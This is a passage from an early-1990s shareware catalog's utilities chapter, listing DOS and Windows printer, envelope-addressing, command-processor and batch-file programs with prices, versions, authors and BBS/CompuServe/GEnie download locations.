LIB 5 on GEnie. + Download size: 25k + Description: + Just slip a floppy disk in Drive A or Drive B, load this easy- + to-use program, and in just seconds your DeskJet will print out + a sleeve template containing the names of all the files (date + and size for each file, too). Just cut it out, fold back the + flaps and tape or glue, and you have a storage sleeve for your + 51/4" & 31/2" disks. + + Product: ESF's DeskJet Fonts & Utilities + Needs: IBM PC, DOS 2.1 or better. HP DeskJet printer. + Author: Elfring Soft Fonts, 708-377-3520 + Registration: $25.00 + Version: 1.5 (07-10-91) + User benefits: Telephone support. + Look for: availability unknown on BBSs; DJFNT5.ZIP in HP forum + LIB 5 (multiple files) on CompuServe. + Download size: 330k + Description: + Collection of 18 soft fonts for HP DeskJet printers. (All 3 + models.) Printer drivers for WordPerfect 5.0 & 5.1, MS Word + 5.X, MS Works, PC Write, and Windows 3.0. Fonts include Helv & + Roman 10 & 12 point medium/bold/italic, Script & Old English 8 + & 10 point, Symbols 24 point, and Square 10 point 10 pitch. + Utility programs for downloading and printing sample pages. + Easy to use INSTALL program and new tutorial on soft fonts. + + Chapter 2, "Utilities" 52 + + + + Product: ESF's European DeskJet Fonts + Needs: IBM PC, DOS 2.1 or better. HP DeskJet printer with RAM + cartridge. + Author: Elfring Soft Fonts, 708-377-3520 + Registration: $25.00 + Version: 1.0 (07-10-91) + User benefits: Telephone support. + Look for: availability unknown on BBSs; EDFNT1.ZIP in HP forum + LIB 5 on CompuServe. + Download size: 340k + Description: + A collection of 12 soft fonts that print in almost any western + European language, including English, German, French, & + Spanish. Includes Roman, Helv, and Garamond in 12 point m/b/i + + 18 point bold all with the PC-8 symbol set. Also has utilities + for downloading and sample page printing. Printer drivers for + WordPerfect 5.1, MS Word 5.X, MS Works, and Windows are + included. Now with easy install program and tutorial on soft + fonts. + + Product: LASR-MAN + Laser printer utility for multi-pages/sheet. See full + description on page 57. + + Product: TSR Download + Soft font manager for LaserJet & DeskJets. See full + description on page 45. + + Product: ZapCode Pro Printer Control + Send control codes to printer(s). Customizabl. See full + description on page 48. + + 2.4.3.3 HP LaserJet + + Product: 4Print + Needs: IBM PC, DOS 2.0 or better. 200k RAM; HP LaserJet or + DeskJet printer. + Author: Korenthal Associates, Inc., 212-242-1790 + Registration: $49.95 + Version: 4.1 (08-15-91) + User benefits: Typeset illustrated manual, 4FOLD and KAZAP + companion utilities, free technical support, and notification + of major upgrades. + Look for: 4PR410.ZIP on BBSs (call 718-837-3236 to download it at + no charge); 4PR410.ZIP in PCVENB forum LIB 3 on CompuServe; + 4PR410.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 240k + Description: + Prints 2 or 3 fully readable pages of text on each sheet of + paper using your LaserJet's or DeskJet's landscape (sideways) + printing capability. Can print on both sides of the page to + yield 4, 6, or even more pages of text per sheet. Perfect for + program listings and documentation; can print one wide column + for spreadsheet and database reports. Includes 4Book for + + Chapter 2, "Utilities" 53 + + + + creating handsome booklets. Supports A4 paper. "Definitely + worth adding to your printer toolbox," says PC Magazine + (3/27/90). + + Product: 4Shell for Windows + Needs: IBM PC, Windows 3.0 or better. 4Print and 4Book from + Korenthal Associates. + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Registration: $20.00 + Version: 1.0 (08-21-91) + User benefits: One year mail support, 900# phone support. + Look for: 4SHELL.ZIP on BBSs; 4SHELL.ZIP in IBMHW forum LIB 2 on + CompuServe; 4SHELL.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 75k + Description: + This Windows 3.0 program will allow you to use the popular + LaserJet and DeskJet utilities, 4Print and 4Book, under + Windows. You *must* download the file 4PR410.ZIP (from + Korenthal Associates) in order to use this program. 4Shell will + allow you to select the options and build a "configuration" for + both 4Print and 4Book and save the options as your default. + + Product: Badge-O-Magic + Needs: IBM PC, DOS 2.1 or better. 384k RAM. HP LaserJet+ + printer. + Author: Ward Mundy Software, 404-237-9420 + Registration: $50.00 + Version: 1.2 (07-10-89) + User benefits: Next version free plus 90 days free support by + phone/mail/BBS. Badge supplies also available to registered + users at discounted prices. + Look for: BADGE12.ZIP on BBSs (call 404-879-5985 to download it + at no charge); BADG11.EXE in IBMAPP forum LIB 7 on CompuServe; + BADGE12.ZIP in IBM RTC LIB 0 on GEnie. + Download size: 360k + Description: + Introducing a convenient, easy-to-use and affordable way to + prepare name tags for conventions, meetings, and social + gatherings. Using virtually any PC with a LaserJet II-compat. + printer, you now can quickly generate easy-to-read name tags. + + Six custom soft fonts areincluded with the software ranging in + size from 10 to 40 points. Includes a dBASE compatible file + manager to manipulate your data bases for printing. Label + template makes it easy to buy label stock from any printer. + + Chapter 2, "Utilities" 54 + + + + Product: BOOKLET + Needs: IBM PC, DOS 3.3 or better. HP LaserJet or DeskJet + printer. + Author: Sympathetic Software + Registration: $20.00 + Version: 3.6 (10-23-91) + User benefits: Master disks, free upgrading. + Look for: BOOKLT36.ZIP on BBSs (call 714-730-6743 to download it + at no charge); BOOKLT.EXE in ZNT:UTILFORUM forum LIB 14 on + CompuServe. + Download size: 50k + Description: + Creates PC Booklet sized documents from full page documents. + Prints four pages of the document on each sheet of paper. The + pages are printed "half size" on the right and left halves of + both sides of the sheet turned sideways. Handles A4, LETTER, + LEGAL, and EXEC paper. Also prints single sided. + + Converts word processor HPPCL output to fit the reduced size. + Formatting is preserved. Extensive error recovery allows + restart after jams or other printing failures. Command line + interface. + + Product: BOOKLET-SCREEN + Needs: IBM PC, DOS 3.3 or better. HP LaserJet or DeskJet + printer. + Author: Sympathetic Software + Registration: $20.00 + Version: 1.3 (10-23-91) + User benefits: Master disks, free upgrading. + Look for: BOOKLS13.ZIP on BBSs (call 714-730-6743 to download it + at no charge); BOOKLS.EXE in ZNT:UTILFORUM forum LIB 14 on + CompuServe. + Download size: 125k + Description: + Creates PC Booklet sized documents from full page documents. + Prints four pages of the document on each sheet of paper. The + pages are printed "half size" two pages per side of the paper + turned sideways. Handles A4, LETTER, LEGAL, and EXEC paper. + Also prints single sided. + + Converts word processor HPPCL output to fit reduced size. + Formatting is preserved. Extensive error recovery allows + restart after jams or other failures. Menu/Screen interface + with online help. + + Chapter 2, "Utilities" 55 + + + + Product: DMPLAS (Dot Matrix to LaserJet) + Needs: IBM PC, DOS 2.0 or better. 6k RAM. + Author: Software Co-op, 317-856-6052 + Registration: $32.00 + Version: 1.0 (08-15-91) + User benefits: Printed manual, latest version on disk, BBS/phone/ + mail support, notice of updates. + Look for: DMPLAS??.ZIP (multiple files) on BBSs (call + 317-856-2087 to download it at no charge); DMPLS*.ZIP in IBMHW + forum LIB 2 (multiple files) on CompuServe. + Download size: 225k + Description: + Small TSR (6k) captures and translates IBM/Epson FX output for + the HP LaserJet. Works with both text and graphics programs + (including GRAPHICS.COM). + + Uses native LaserJet (or compatible) fonts or your softfonts. + Optional Courier italic and proportional fonts are also + included. + + Prints at accurate scale (for filling in forms) or slightly + reduced vertical spacing to print 66 lines per page. Graphics + can also be slightly compressed to fit on the LaserJet's 10" + page. + + Product: ESF's European LaserJet Fonts + Needs: IBM PC, DOS 2.1 or better. HP LaserJet II printer. + Author: Elfring Soft Fonts, 708-377-3520 + Registration: $25.00 + Version: 1.0 (05-20-91) + User benefits: Telephone support. + Look for: availability unknown on BBSs; ELFNT1.ZIP in HP forum + LIB 4 (multiple files) on CompuServe. + Download size: 330k + Description: + A collection of 12 soft fonts print in any western European + language. They work on any HP LaserJet II or better printer and + offer: English, German, French, Spanish, etc. Printer drivers + are included for WordPerfect 5.0 & 5.1, MS Word 5.X, MS Works, + Ventura, and Windows 3.0. Utilites are included that will + download the fonts and print sample sheets of them. All fonts + have the PC-850 symbol set and include: Helv, Roman, & Garamond + in 12 point medium/bold/italic + 18 point bold. New tutorial on + fonts. + + Chapter 2, "Utilities" 56 + + + + Product: ESF's LaserJet Fonts & Util. + Needs: IBM PC, DOS 2.1 or better. HP LaserJet printer. + Author: Elfring Soft Fonts, 708-377-3520 + Registration: $25.00 + Version: 1.5 (07-10-91) + User benefits: Telephone support. + Look for: availability unknown on BBSs; LJFNT4.ZIP in HP forum + LIB 4 (multiple files) on CompuServe. + Download size: 330k + Description: + Collection of 21 soft fonts for HP LaserJet or compatible + printers. Includes printer drivers for WordPerfect 5.0 & 5.1, + MS Word 5.X, MS Works, Ventura, & Windows. Utility programs + include DOWNLOAD, DISPFONT, & FONTINFO. Fonts include: Helv & + Roman 10 & 12 point medium/bold/italic, Helv & Roman 18 point + bold, 12 point Century Legal, Script, Flourish, 18 point + Broadway & Dingbats, 10 point KeyCaps, 10 point Greek. Easy + INSTALL program to unpack fonts and new tutorial on soft fonts. + + Product: JetPilot LaserJet Control + Needs: IBM PC, DOS 2.0 or better. HP LaserJet II/IID/IIP/III/ + IIID/IIISi/IIIP printer. + Author: Morton Utilities, 619-347-7563 + Registration: $42.95 + Version: 1.2 (08-18-91) + User benefits: Printed manual, master disks, 6 months support. + Look for: JP12.EXE on BBSs (call 203-634-0370 to download it at + no charge); JP12.ZIP in IBMHW forum LIB 2 on CompuServe. + Download size: 70k + Description: + Use pull-down menus to control virtually every feature of your + LaserJet printer. Change page settings such as paper source, + destination, size, orientation, margins etc. Change font + characteristics such as symbol set, typeface, spacing etc. + Select fonts from cartridge or internal preset files. Print + envelopes that import the address right off the screen. Save + settings to setup files which can be later loaded to restore + LaserJet to specific settings. Use as TSR or stand-alone. + Supports EMS. + + Chapter 2, "Utilities" 57 + + + + Product: LaserForm + Needs: IBM PC, DOS 3.0 or better. 640k RAM, VGA monitor, mouse, + HP LaserJet printer. Scanner optional. + Author: Real Software, 408-476-3550 + Registration: $39.00 + Version: 1.00 (07-01-91) + User benefits: Lastest disk, printed manual, support. + Look for: LFORMS.ZIP on BBSs (call 408-476-1055 to download it at + no charge); LFORMS.ZIP in IBMAPP forum LIB 6 on CompuServe; + LFORMS.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 200k + Description: + A tool for printing existing databases on existing forms. It + is a WYSIWYG program to match your output with your form, and a + printer driver which formats on the fly from your database or + other program. + + Product: LASR-MAN + Needs: IBM PC, DOS 3.0 or better. HP LaserJet printer. + Author: Micrometric, 813-377-2515 + Registration: $30.00 + Version: 2.11 (05-24-91) + User benefits: Printed & bound 7'x8.5' manual, one yr. phone/mail + support, next release notification. + Look for: LASR@211.ZIP on BBSs. + Download size: 238k + Description: + Laser printer utility for ASCII files with sixteen styles; + portrait or landscape orientation with 10, 12 or 16 characters/ + inch (cpi) printing on one or both sides of each sheet; + landscape orientation at 16 cpi, two 72 lines pages on one + side, four pages both sides; booklet (single files) or manual + (multiple files are treated as chapters). Configuration files + allow printing on legal size paper or non-HP printers. + + Product: LJ-SLEEVE [***] + Needs: IBM PC, DOS 3.0 or better. HP LaserJet printer or + compatible. + Author: JMJ Software, 704-525-1472 + Registration: $14.95 + Version: 1.0 (03-31-92) + User benefits: One year mail/CIS support, printed manual. + Look for: LJSLEV.ZIP on BBSs; LJSLEV.ZIP in HPPER forum LIB 4 on + CompuServe; LJSLEV.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 25k + Description: + Just slip a floppy disk in Drive A or Drive B, load this easy- + to-use program, and in just seconds your LaserJet or compatible + printer will print out a sleeve template containing the names + of all the files (date and size for each file, too). Just cut + it out, fold back the flaps and tape or glue, and you have a + storage sleeve for your 51/4" & 31/2" disks. + + Chapter 2, "Utilities" 58 + + + + Product: Over_LAZ + Needs: IBM PC, DOS 2.0 or better. WordPerfect 5.0 or later. HP + LaserJet II printer. + Author: Herne Data Systems Ltd, 519-366-2732 + Registration: $25.00 + Version: 2 (02-14-92) + User benefits: Free personalized letterhead overlay. Additional + personal letterheads also available. + Look for: availability unknown on BBSs; OVER2.ZIP in IBMAPP forum + LIB 2 on CompuServe. + Download size: 276k + Description: + A collection of over 75 printer overlay files for WordPerfect + 5.0 or later and an HP LaserJet compatible printer. Over_LAZ + are provided for standard office forms (inter office memo, FAX + transmittal, etc) as well as 'rubber stamps' (draft, + confidential, etc) and decorative page borders. + + Over_LAZ are automatically printed on the page by WordPerfect + over your document. Extra fonts are not required. 512k + printer RAM is sufficient. + + Product: QFont + Needs: IBM AT (80286), DOS 2.1 or better. Hercules or EGA + monitor. Mouse. + Author: Jamestown Software, 608-271-2090 + Registration: $80.00 + Version: 1.5 (10-20-90) + User benefits: Printed manual and disk; phone/BBS/newsletter + support. + Look for: QFONT*.* on BBSs (call 608-271-3685 to download it at + no charge); QFONT.* in IBMSYS forum LIB 7 on CompuServe. + Download size: 150k + Description: + Graphic "paint" program to edit and create HP Laserjet + downloadable soft fonts. Has complete editing functions -- cut + and paste, circle, curves, arcs, lines, rectangles, fills and + so on -- plus powerful transformation functions such as shadow, + outline, bolden, lighten, slant and resize. Modify font + headers. Test spacing. Download fonts with sample printouts. + Change mono spaced fonts to proportional and vice versa. Use + fonts in DTP programs like Ventura, or wordprocessors such as + WordPerfect. + + Product: TSR Download + Soft font manager for LaserJet & DeskJets. See full + description on page 45. + + Product: ZapCode Pro Printer Control + Send control codes to printer(s). Customizabl. See full + description on page 48. + + Chapter 2, "Utilities" 59 + + + + 2.4.3.4 PostScript + + Product: Over_LAZ PS + Needs: IBM PC, DOS 2.0 or better. WordPerfect 5.0 or later. + PostScript printer. + Author: Herne Data Systems Ltd, 519-366-2732 + Registration: $25.00 + Version: 2 (02-14-92) + User benefits: Free personalized letterhead overlay. Additional + personal overlays available. + Look for: availability unknown on BBSs; OVERPS.ZIP in IBMAPP + forum LIB 2 on CompuServe; OVERPS.ZIP in IBMPC RTC LIB 0 on + GEnie. + Download size: 117k + Description: + A collection of over 70 printer overlay files for WordPerfect + 5.0 or later and a PostScript compatible printer. Over_LAZ are + provided for standard office forms (inter office memo, FAX + transmittal, etc) as well as rubber stamps (draft, + confidential, etc) and decorative page borders. Over_LAZ PS are + automatically printed on the page by WordPerfect over your + document. + + Product: PM2LINO [***] + Needs: IBM PC, DOS 3.0 or better. PageMaker PC PostScript files. + Author: JMJ Software, 704-525-1472 + Registration: $0.00 + Version: 1.0 (03-01-92) + User benefits: One year CompuServe/mail support. + Look for: PM2LINO.ZIP on BBSs; PM2LIN.ZIP in DTPFORUM forum LIB 6 + on CompuServe. + Download size: 9k + Description: + This utility removes Control-D characters from print-to-file + PostScript files created by PC PageMaker for later output by + Linotronic or other imagesetters driven by Mac systems. Failure + to remove these characters results in failure to output files + on imagesetter. This utility is command line driven and + supports DOS wildcards. + + Product: PS-SLEEVE [***] + Needs: IBM PC, DOS 3.0 or better. PostScript printer set up on + LPT1, LPT2 or LPT3. + Author: JMJ Software, 704-525-1472 + Registration: $14.95 + Version: 2.0 (03-01-92) + User benefits: Printed manual, one year CompuServe/mail support. + Look for: SLEEVE.ZIP on BBSs; SLEEVE.ZIP in DTP forum LIB 6 on + CompuServe; SLEEVE.ZIP in PSRT RTC LIB 1 on GEnie. + Download size: 26k + Description: + Print 51/4" or 31/2" floppy disk storage sleeves on your PostScript + printer. Just insert a floppy disk in Drive A or B and print a + sleeve template on your printer containing up to 192 file names + + Chapter 2, "Utilities" 60 + + + + in all subdirectories on the floppy. Cut it apart, tape or + glue the flaps, and you're done. Don't get writer's cramp + writing all those tiny file names. Use PS-SLEEVE instead. + + Product: PS-TEXT [***] + Needs: IBM PC, DOS 3.0 or better. + Author: JMJ Software, 704-525-1472 + Registration: $0.00 + Version: 1.0 (08-01-91) + User benefits: One year free support by mail or CIS. + Look for: PSTEXT.ZIP on BBSs; PSTEXT.ZIP in ADOBE forum LIB 3 on + CompuServe. + Download size: 13k + Description: + Extracts all text from a print-to-file PostScript file to a new + file in ASCII format for re-formatting. Text comes in without + any formatting. Program operates from command line (typing + PSTEXT alone lists required parameters). + + 2.4.4 Envelope addressers + + Product: DJ-LOPE [***] + Envelope Printer/Database for DeskJet printer. See full + description on page 50. + + Product: GRAB Plus(r) + Needs: IBM PC, DOS 3.0 or better. Any printer that will hold an + envelope. + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Registration: $49.95 + Version: 6.1 (09-20-91) + User benefits: Printed manual, master disks, one year mail + support, 900# phone support. + Look for: GRAB*.ZIP (multiple files) on BBSs; GRAB*.ZIP in IBMAPP + forum LIB 2 (multiple files) on CompuServe; GRAB*.ZIP in IBMPC + RTC LIB 5 (multiple files) on GEnie. + Download size: 444k + Description: + This 6k TSR will capture the name and address from your + favorite word processor and send it formatted to an envelope in + your printer. Works on any printer that will hold an envelope + or label. Uses special features of LaserJet, DeskJet, and + PostScript printers. Prints the postal bar codes on your ZIP+4 + zip codes in the address. Includes GRABDB, a database for + storing thousands of names and addresses. Also includes + LaserLabel, a powerful label printing program. + + Chapter 2, "Utilities" 61 + + + + Product: GRAB Plus(r) for Windows + Needs: IBM PC, Windows 3.0 or better. Any printer that will hold + an envelope. + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Registration: $49.95 + Version: 1.3 (09-20-91) + User benefits: Printed manual, master disks, one year mail + support, 900# phone support. + Look for: WINGRAB.ZIP on BBSs; WINGRA.ZIP in IBMAPP forum LIB 2 + (multiple files) on CompuServe; WINGRAB.ZIP in IBMPC RTC LIB 5 + (multiple files) on GEnie. + Download size: 388k + Description: + This is the Microsoft Windows version of the GRAB Plus(r) + envelope addressing system. Prints the name and address from + within your Windows application specially formatted for your + printer. Prints postal barcodes on LaserJet, DeskJet, and + PostScript printers. Comes with macros to attach to Word for + Windows and Ami Professional. See GRAB Plus(r) in this catalog + also. Use on multiple printers for both envelopes and labels. + + Product: JetPilot LaserJet Control + Control LJ, Select Fonts, Print Envelopes. See full + description on page 56. + + Product: Plain Vanilla Labels + Simple but complete label printer. See full description on + page 145. + + Product: PrintEnvelope [***] + Needs: IBM PC, Windows 3.0 or better. VBRUN100.DLL. + Author: Maurer Associates, 914-562-6600 + Registration: $30.00 + Version: 2.30 (03-04-92) + User benefits: Registered disk, upgrade notification. + Look for: ENVELOPE.ZIP on BBSs; ENVELO.ZIP in WINADV forum LIB 1 + on CompuServe; PRENV230.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 78k + Description: + A complete Windows 3.x mail addressing system. Print envelopes + or labels of any size. Use different fonts for the addressee, + note text and return address or use a Windows .BMP graphic as + the return address. Type addresses on the fly, paste from + other applications, use an address book or import a mail list + in Windows Carfile or ASCII file format. Will do USPS approved + PostNet bar codes. Supports laser, dot matrix and PostScript + printers and automatically sets orientation and selects paper + bins. + + Product: Public Address [***] + High-performance compact Address database. See full + description on page 146. + + Chapter 2, "Utilities" 62 + + + + 2.5 System Utilities + + 2.5.1 Operating systems + + Product: 4FILES [***] + File manager & annotator for 4DOS & NDOS. See full description + on page 100. + + Product: AutoCon [***] + Autoexec/Config reconfiguration manager. See full description + on page 69. + + Product: VMiX 386 + Needs: IBM PC, DOS 3.1 or better. DOS 5.0 and 80386 recommended. + Author: Commercial Software Associates (ComSoft), 714-720-1214 + Registration: $59.00 + Version: 2.67 (12-20-91) + User benefits: Printed manual, Applications Programming + Interface, BBS support. + Look for: VMIX267.EXE on BBSs (call 714-720-1139 to download it + at no charge); VMIX.EXE in IBMSYS forum LIB 4 on CompuServe. + Download size: 180k + Description: + A multitasker and multiuser Protected Mode Dos Extender + environment for IBM (PC, XT, AT, EISA, PS/2) compatibles. + Automatically configures itself to your environment. + + In 8086 and 286 computers, it will multitask using only + available conventional memory with task swapping to extended + memory, where available. On 386 computers each virtual task + gets its own screen and 640KByte partition from extended + memory. Up to 4 users at the COMM ports. + + 2.5.2 Multi-OS utilities + + Product: BootMaster [***] + Boot Configuration Manager. See full description on page 70. + + Chapter 2, "Utilities" 63 + + + + 2.5.3 Command processors + + Product: 4DOS + Needs: IBM PC, DOS 2.0 or better. + Author: JP Software Inc., 617-646-3975 + Registration: $69.00 + Version: 4.0 (08-26-91) + User benefits: Typeset quality printed manual, free or low-cost + upgrade to next major release, newsletter, technical support. + Look for: 4DOS4*.ZIP on BBSs (call 617-354-8873 to download it at + no charge); 4DOS4*.ZIP in PCVENB forum LIB 10 (multiple files) + on CompuServe. + Download size: 450k + Description: + Replaces COMMAND.COM for MS-DOS, PC-DOS, and DR-DOS. Enhances + most DOS commands, over 40 new commands. Command editing, + history, aliases, point-and-shoot file selection, high-speed + batch files, much much more. 1989 PC Mag Tech Excellence + Finalist (ver. 2.21). Compatible with COMMAND.COM and + virtually all PC hardware and software. Easy installation and + configuration, network-compatible. If you use DOS then you + already know how to use 4DOS. If you want more from DOS you + need 4DOS! + + Product: CM_FILER [***] + Multi-Function Disk/File Manager. See full description on + page 101. + + Product: HDM IV - Hard Disk Menu + DOS Menu & Security System, Network Support. See full + description on page 96. + + Product: VMiX 386 + MSDOS MultiTasker MultiUser for 8086 to 486. See full + description on page 62. + + Product: WinBatch + Windows Batch Language. See full description on page 69. + + 2.5.4 Batch & macro utilities + + Product: 4DOS + Enhanced DOS command processor. See full description on + page 63. + + Product: BatchMaker Plus + A DOS Menu/Utility/Editor/Information + more. See full + description on page 7. + + Chapter 2, "Utilities" 64 + + + + Product: BATUTIL + Needs: IBM PC, DOS 2.0 or better. + Author: CTRLALT Associates + Registration: $43.00 + Version: 4.0 (12-23-91) + User benefits: Printed manual; CompuServe support. + Look for: availability unknown on BBSs; SKEY??.ZIP in IBMSYS + forum LIB 3 on CompuServe. + Download size: 350k + Description: + Lets you spiff up your batch files with accesss to hardware + information, display of text in color and/or large letters, pop + up menus and file lists. You can directly access the + environment and have paths up to 255 characters long. + + PC Magazine called it the 'ultimate batch enhancer' and PC + World and PC Computing included it in "Best of.." articles. + + Version 4.0 has a full fledged language with if..then, case, + etc. + + Product: Bmenu + Pop-up menu program for batch files. See full description on + page 93. + + Product: Command Post + Programmable Shell/File Mgr. for Windows 3.0. See full + description on page 104. + + Product: DOS Extensions for Professional + A cohesive pkg of 7 powerful disk utilities. See full + description on page 15. + + Product: Duplicate File Locator (DFL) + Prcss dups in&out ALL arcs,disks. Many modes. See full + description on page 15. + + Product: ENVI-MAN + Needs: IBM PC, DOS 3.0 or better. + Author: Micrometric, 813-377-2515 + Registration: $15.00 + Version: 1.00 (04-26-91) + User benefits: Printed & bound 7'x8.5' manual, one year phone/ + mail support, next release notification. + Look for: ENVI@100.ZIP on BBSs. + Download size: 138k + Description: + An environment utility that accomplishes two major function. + First - display all current environment strings and data about + the environment such as the location, size and space + availability of the Master environment. Second - let a batch + file know how much environment space is currently available and + to provide a graceful exit if there isn't enough. It may also + show under certain circumstances the size of the master + + Chapter 2, "Utilities" 65 + + + + environment can be expanded without changes being made to + CONFIG.SYS. + + Product: EXTENDED BATCH LANGUAGE-PLUS! + Needs: IBM PC, DOS 2.0 or better. + Author: Seaware Corp., 407-738-1712 + Registration: $79.00 + Version: 4.07 (07-01-91) + User benefits: Printed manual, master disks, six months phone/ + BBS/newsletter support. + Look for: EBL.ZIP on BBSs (call 407-738-1843 to download it at no + charge); EBL*.ZIP in IBMSYS forum LIB 1 on CompuServe. + Download size: 100k + Description: + Makes your batch files hum! It adds professional extensions to + existing MS-DOS batch files to: + * Integrate and automate programs to work together + * Speeds batch files up to 5 times faster + * Adds structured IF, REPEAT, WHILE, BEGIN/END commands + * Create menus automatically + * Design professional user interfaces (windows, several menu + types, sound, and more) + * Adds over 100 commands, functions, and expression types. + + Using batch files will never be the same! + + Product: Getkey/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $10.00 + Version: 1.00 (02-25-90) + User benefits: Eligibility for free upgrades. + Look for: GETKO100.ZIP on BBSs; GETKO1.ZIP in IBMSYS forum LIB 2 + on CompuServe. + Download size: 8k + Description: + Reports the ASCII code of a user keystroke as an ERRORLEVEL. + Great for getting user menu selections or input during batch + files. Options for checking input against edit mask, making + use press Enter, flushing keyboard buffer before accepting + keystroke, hiding cursor, disabling ^C & ^Break, capitalizing + the key, echoing it to the screen, and beeping after invalid + input. + + Product: LOGIK MENU + Menu System, 43/50 lines, Mouse, Events, Log. See full + description on page 96. + + Chapter 2, "Utilities" 66 + + + + Product: MENU-MAN + Needs: IBM PC, DOS 3.0 or better. + Author: Micrometric, 813-377-2515 + Registration: $15.00 + Version: 1.21 (05-24-91) + User benefits: Printed & bound 7'x8.5' manual, one yr. phone/mail + support, next release notification. + Look for: MENU@121.ZIP on BBSs. + Download size: 163k + Description: + Allows the display of user selection menus from within batch + files. These menus are controlled by command line options and + can contain a title and up to nineteen selection option lines + that are generated from REM lines in the batch file which + follows the call to MENU-MAN. Options include a user response + time limit, menu positioning, erasing the screen before/after + menu display, and menu sound, color and type customization. + + Product: Painless Event Processor + Needs: IBM PC, DOS 2.1 or better. 128k RAM. + Author: Painless Accounting, 800-521-9905 + Registration: $45.00 + Version: 1.01 (05-31-91) + User benefits: Registered users receive the latest copy of the + program, along with a printed and bound manual. Also receive + major discounts on updates. + Look for: PEP.ZIP on BBSs (call 214-881-0313 to download it at no + charge); PEP.ZIP in IBMSYS forum LIB 3 on CompuServe; PEP.ZIP + in IBM RTC LIB 3 on GEnie. + Download size: 100k + Description: + A revolutionary concept in computer software. Allows your PC to + work 24 hours a day. Simply tell the processor when to execute + programs, batch files, utilities, tasks, etc. and at the + specified time the keystrokes will be tnered into your computer + as if you were sitting at the keyboard. TSR requiring 10K. + Great for nightly backups, speed disk, and countless other + processes. + + Product: PALERT + Needs: IBM PC, DOS 2.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Version: 2.3 (06-12-91) + User benefits: Latest version and updates. $45 gets package of 8 + utilities & bound manual. + Look for: PALERT23.ZIP on BBSs (call 714-352-2825 to download it + at no charge); PALERT.ARC in IBMSYS forum LIB 3 on CompuServe. + Download size: 27k + Description: + A batch file utility designed to check your disk freespace + before starting an application. Specify how much disk + freespace you need for a program and let PALERT insure it + exists before starting an application. Dont be caught in your + + Chapter 2, "Utilities" 67 + + + + wordprocessor or spreadsheet with a file that is too big to be + saved. Put PALERT in your AUTOEXEC.BAT file to warn you when + your hard disk is getting full. Presents a graphical + representation of space to let you quickly determine freespace + levels. + + Product: PATH-MAN + Needs: IBM PC, DOS 3.0 or better. + Author: Micrometric, 813-377-2515 + Registration: $10.00 + Version: 1.10 (05-24-91) + User benefits: Printed & bound 7'x8.5' manual, one yr. phone/mail + support, next release notification. + Look for: PATH@110.ZIP on BBSs. + Download size: 136k + Description: + A utility that searches the directory path elements of the PATH + statement for a given file. The search file name may include + DOS wildcard characters. The ERRORLEVEL variable is set, based + on the results of this search, to allow more user friendly + batch files - a graceful exit can be made when needed data + files or programs are missing. Optionally, the path ele-ment on + which the search file is located may be displayed. + + Product: PDAILY + Needs: IBM PC, DOS 2.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $10.00 + Version: 1.0 (08-18-90) + User benefits: Current version and future updates. $45 gets 8 + utility set with bound manual. Money Back gurantee. + Look for: PDAILY.ZIP on BBSs (call 714-352-2825 to download it at + no charge); PDAILY.ARC in IBMSYS forum LIB 3 on CompuServe. + Download size: 11k + Description: + Lets users execute one or more DOS batch commands once per day. + Use it when you execute a batch command multiple times per day + but want selected commands to execute only once. For instance + backup or disk cleanup. Can be implemented in your + AUTOEXEC.BAT file. Part of the Patriquin Utilities. + + Chapter 2, "Utilities" 68 + + + + Product: PowerBatch Compiler + Needs: IBM PC, DOS 2.0 or better. + Author: CSD, Inc., 404-740-9583 + Registration: $30.00 + Version: 1.4j (05-08-91) + User benefits: Latest version of the compiler and documentation. + Notification of updates. + Look for: availability unknown on BBSs; PWRBAT.EXE in IBMSYS + forum LIB 1 on CompuServe. + Download size: 140k + Description: + A dynamic new batch command compiler which provides the + capability of creating standalone executable modules (.EXE) + with speed and security. Standard batch functions are enhanced + with over 40 additional commands for FLEXIBILITY never before + available in a batch command file. Modules run with the SPEED + only compiled programs can achieve. Maximum SECURITY can be + acheived by creating modules that cannot be terminated by + pressing any break key. + + Product: Probat + Needs: IBM PC, DOS 2.0 or better. + Author: Mark Tigges, 604-926-0366 + Registration: $35.00 + Version: I (09-11-88) + User benefits: Technical assistance and discounted upgrades. + Look for: DOPPLER (multiple files) on BBSs (call 604-277-9970 to + download it at no charge). + Download size: 480k + Description: + This program has revolutionized the way complex batch files are + built. This sophisticated program gives you the power to create + batch files with chaining screens, graphic screen layout, + keyboard input acceptance, and informational prompting. Lets + you draw boxes, set screen colors, and create menues. There is + even a handsome graphics menu screen you can integrate into + your batch files. Though it takes some time to learn, the + results are the most professional batch files possible. + + Product: STACKEY + Keystroke stacking utility. See full description on page 41. + + Chapter 2, "Utilities" 69 + + + + Product: Utility_Belt + Needs: IBM PC, DOS 3.0 or better. + Author: Herne Data Systems Ltd, 519-366-2732 + Registration: $25.00 + Version: 1.1a (02-14-92) + User benefits: Technical support, upgrades. + Look for: availability unknown on BBSs; BELT1A.ZIP in IBMSYS + forum LIB 3 on CompuServe; BELT1A.ZIP in IBMPC RTC LIB 0 on + GEnie. + Download size: 59k + Description: + A collection of 18 utilities designed to simplify the creation + of professional looking DOS .BATch files. Six interactive + utilities (SELECT, CONFIRM, WAIT, GETKEY, SLEEP, BLEEP) accept + user input. Nine video utilities add pizzazz to displays and + allow full access to all video text pages on CGA, EGA and VGA + system (VPAT, VPCLS, VPFLIP, VPTNT, VPSET, VPBH, VPSTRIPE, + VPBOX, VPCOPY). Three security and diagnostic utilities + (REBOOT, HANG, WHATIS) are also included. + + Product: WinBatch + Needs: IBM PC, Windows 3.0 or better. + Author: Wilson WindowWare, Inc., 206-937-9335 + Registration: $69.95 + Version: 3.0A (02-15-91) + User benefits: Printed manual, tech support, 90-day money back + gaurantee. + Look for: WBT30A.ZIP on BBSs (call 206-935-5198 to download it at + no charge); WBT30A.ZIP in WINAPA forum LIB 15 on CompuServe. + Download size: 180k + Description: + A Windows batch language interpreter which brings the power of + batch language programming to the Windows environment. Can do + pretty much everything the old DOS batch files can 